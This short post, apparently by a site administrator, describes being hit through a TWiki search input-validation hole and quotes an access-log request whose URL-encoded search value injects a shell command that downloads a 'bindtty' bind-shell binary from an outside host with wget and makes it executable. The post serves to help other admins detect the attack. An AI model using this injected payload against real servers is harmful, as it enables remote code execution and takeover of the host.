TWiki Input Validation Hole in Search Function Lets Remote Users Execute Shell Commands - This one got me at the OpenInteract wiki site. How do you know you’ve been bit? Check your access log for a GET URL like:
search/TWiki/?search=doesnotexist1%27%3B+%28wget+http%3A%2F%2Fblank.exitnic.net%2Fbindtty%3B+chmod+777+bindtty...
As long as your web server is running as an unprivileged user (like apache) you shouldn't be up the creek. It's still goddamned annoying these little bastards make simple things a chore...